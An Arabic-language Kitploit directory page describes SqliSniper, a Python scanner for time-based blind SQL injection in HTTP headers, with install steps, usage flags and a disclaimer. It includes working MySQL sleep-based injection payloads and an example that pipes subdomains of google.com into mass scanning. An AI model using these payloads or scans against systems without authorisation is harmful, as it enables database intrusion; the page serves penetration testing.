Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
SqliSniper — أداة متقدمة لاختبار اختراق SQL الأعمى القائم على الوقت لرؤوس HTTP | Kitploit
أدوات/GitHubGitHub/danialhalo/sqlisniper
ماسحات الثغرات الأمنيةأمن الويبالاختبار العشوائي
GitHubdanialhalo/sqlisniper

SqliSniper

أداة متقدمة لاختبار اختراق SQL الأعمى القائم على الوقت لرؤوس HTTP

عرض المستودع
31350منذ 2 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

httpx

الميزات الرئيسية • التثبيت • الاستخدام • تشغيل SqliSniper • المساهمة •

SqliSniper هي أداة Python قوية مصممة لاكتشاف حقن SQL الصامت القائم على الوقت في رؤوس طلبات HTTP. تعمل على تعزيز عملية تقييم الأمان من خلال المسح السريع وتحديد الثغرات المحتملة باستخدام خيوط المعالجة المتعددة، مما يضمن السرعة والكفاءة. على عكس الماسحات الأخرى، صُمم SqliSniper لإزالة النتائج الإيجابية الخاطئة وإرسال التنبيهات عند الاكتشاف، مع وظيفة إشعار Discord المدمجة.

alt text

الميزات الرئيسية

  • الكشف عن حقن SQL الصامت القائم على الوقت: تحديد ثغرات حقن SQL المحتملة في رؤوس HTTP.
  • المسح متعدد الخيوط: إمكانيات مسح أسرع من خلال المعالجة المتزامنة.
  • إشعارات Discord: إرسال تنبيهات عبر webhook الخاص بـ Discord عند اكتشاف الثغرات.
  • فحص النتائج الإيجابية الخاطئة: تحليل زمن الاستجابة للتمييز بين النتائج الإيجابية الحقيقية والإنذارات الكاذبة.
  • دعم الحمولات والرؤوس المخصصة: يسمح للمستخدمين بتعريف حمولات ورؤوس مخصصة للمسح المستهدف.

التثبيت

root@kitploit:~
git clone https://github.com/danialhalo/SqliSniper.git
cd SqliSniper
chmod +x sqlisniper.py
pip3 install -r requirements.txt

الاستخدام

سيؤدي هذا إلى عرض التعليمات الخاصة بالأداة. فيما يلي جميع الخيارات التي تدعمها.

root@kitploit:~
ubuntu:~/sqlisniper$ ./sqlisniper.py -h


███████╗ ██████╗ ██╗     ██╗    ███████╗███╗   ██╗██╗██████╗ ███████╗██████╗
██╔════╝██╔═══██╗██║     ██║    ██╔════╝████╗  ██║██║██╔══██╗██╔════╝██╔══██╗
███████╗██║   ██║██║     ██║    ███████╗██╔██╗ ██║██║██████╔╝█████╗  ██████╔╝
╚════██║██║▄▄ ██║██║     ██║    ╚════██║██║╚██╗██║██║██╔═══╝ ██╔══╝  ██╔══██╗
███████║╚██████╔╝███████╗██║    ███████║██║ ╚████║██║██║     ███████╗██║  ██║
╚══════╝ ╚══▀▀═╝ ╚══════╝╚═╝    ╚══════╝╚═╝  ╚═══╝╚═╝╚═╝     ╚══════╝╚═╝  ╚═╝

                            -: إعداد محمد دانيال :-

usage: sqlisniper.py [-h] [-u URL] [-r URLS_FILE] [-p] [--proxy PROXY] [--payload PAYLOAD] [--single-payload SINGLE_PAYLOAD] [--discord DISCORD] [--headers HEADERS]
                     [--threads THREADS]

اكتشاف حقن SQL عن طريق إرسال استعلامات ضارة

options:
  -h, --help            show this help message and exit
  -u URL, --url URL     عنوان URL واحد للهدف
  -r URLS_FILE, --urls_file URLS_FILE
                        ملف يحتوي على قائمة عناوين URL
  -p, --pipeline        القراءة من خط الأنابيب
  --proxy PROXY         وكيل لاعتراض الطلبات (مثال: http://127.0.0.1:8080)
  --payload PAYLOAD     ملف يحتوي على حمولات ضارة (الافتراضي هو payloads.txt)
  --single-payload SINGLE_PAYLOAD
                        حمولة واحدة للاختبار
  --discord DISCORD     رابط Webhook الخاص بـ Discord
  --headers HEADERS     ملف يحتوي على الرؤوس (الافتراضي هو headers.txt)
  --threads THREADS     عدد الخيوط

تشغيل SqliSniper

فحص عنوان URL واحد

يمكن توفير العنوان باستخدام العلم -u لفحص موقع واحد

root@kitploit:~
./sqlisniper.py -u http://example.com

إدخال ملف

يسمح العلم -r لـ SqliSniper بقراءة ملف يحتوي على عناوين URL متعددة للمسح المتزامن.

root@kitploit:~
./sqlisniper.py -r url.txt

توجيه عناوين URL عبر الأنابيب

يمكن لـ SqliSniper أيضًا العمل مع الإدخال عبر الأنابيب باستخدام العلم -p

root@kitploit:~
cat url.txt | ./sqlisniper.py -p

تسهل ميزة الأنابيب التكامل السلس مع الأدوات الأخرى. على سبيل المثال، يمكنك استخدام أدوات مثل subfinder و httpx، ثم توجيه مخرجاتها إلى SqliSniper للمسح الجماعي.

root@kitploit:~
subfinder -silent -d google.com | sort -u | httpx -silent | ./sqlisniper.py -p

المسح بحمولات مخصصة

بشكل افتراضي، يستخدم SqliSniper ملف payloads.txt. ومع ذلك، يمكن استخدام العلم --payload لتوفير ملف حمولات مخصص.

root@kitploit:~
./sqlisniper.py -u http://example.com --payload mssql_payloads.txt

عند استخدام ملف حمولات مخصص، تأكد من استبدال زمن الانتظار بـ %__TIME_OUT__%. يقوم SqliSniper بضبط زمن الانتظار ديناميكيًا وبشكل متكرر للتخفيف من النتائج الإيجابية الخاطئة المحتملة. يجب أن يبدو ملف الحمولات هكذا.

root@kitploit:~
ubuntu:~/sqlisniper$ cat payloads.txt 
0\"XOR(if(now()=sysdate(),sleep(%__TIME_OUT__%),0))XOR\"Z
"0"XOR(if(now()=sysdate()%2Csleep(%__TIME_OUT__%)%2C0))XOR"Z"
0'XOR(if(now()=sysdate(),sleep(%__TIME_OUT__%),0))XOR'Z

المسح بحمولة واحدة

إذا كنت ترغب في الاختبار بحمولة واحدة فقط، يمكن استخدام العلم --single-payload. تأكد من استبدال زمن الانتظار بـ %__TIME_OUT__%

root@kitploit:~
./sqlisniper.py -r url.txt --single-payload "0'XOR(if(now()=sysdate(),sleep(%__TIME_OUT__%),0))XOR'Z"

المسح برأس مخصص

يتم حفظ الرؤوس في ملف headers.txt. لمسح رأس مخصص، احفظ رأس طلب HTTP المخصص في ملف headers.txt.

root@kitploit:~
ubuntu:~/sqlisniper$ cat headers.txt 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
X-Forwarded-For: 127.0.0.1

إرسال إشعارات تنبيه Discord

يوفر SqliSniper أيضًا إشعارات تنبيه عبر Discord، مما يعزز وظائفه من خلال توفير تنبيهات فورية عبر webhooks الخاصة بـ Discord. تثبت هذه الميزة قيمتها أثناء عمليات المسح واسعة النطاق، مما يسمح بإشعارات فورية عند الاكتشاف.

root@kitploit:~
./sqlisniper.py -r url.txt --discord <web_hookurl>

تعدد الخيوط

يمكن تعريف الخيوط باستخدام العلم --threads

root@kitploit:~
 ./sqlisniper.py -r url.txt --threads 10

ملاحظة: من المهم مراعاة أن استخدام عدد أكبر من الخيوط قد يؤدي إلى نتائج إيجابية خاطئة أو تجاهل مشكلات صحيحة. نظرًا لطبيعة حقن SQL القائم على الوقت، يُوصى باستخدام عدد أقل من الخيوط للحصول على اكتشاف أكثر دقة.


إخلاء المسؤولية القانوني

استخدام هذه الأداة لمهاجمة أهداف دون موافقة مسبقة متبادلة محظور تمامًا. تقع على عاتق المستخدم النهائي مسؤولية الامتثال لجميع القوانين المحلية والولائية والفيدرالية المعمول بها. يخلي المطورون مسؤوليتهم ولا يتحملون أي مسؤولية عن أي إساءة استخدام أو ضرر ناتج عن هذا البرنامج.


المساهمة

المساهمات في SqliSniper مرحب بها دائمًا. سواء كانت تحسينات في الميزات، أو إصلاحات للأخطاء، أو تحسينات في التوثيق، كل مساعدة موضع تقدير.

الترخيص

SqliSniper موزعة تحت رخصة MIT


SqliSniper صُنعت في python مع الكثير من 💙 بواسطة @Muhammad Danial.

تنزيل الأداة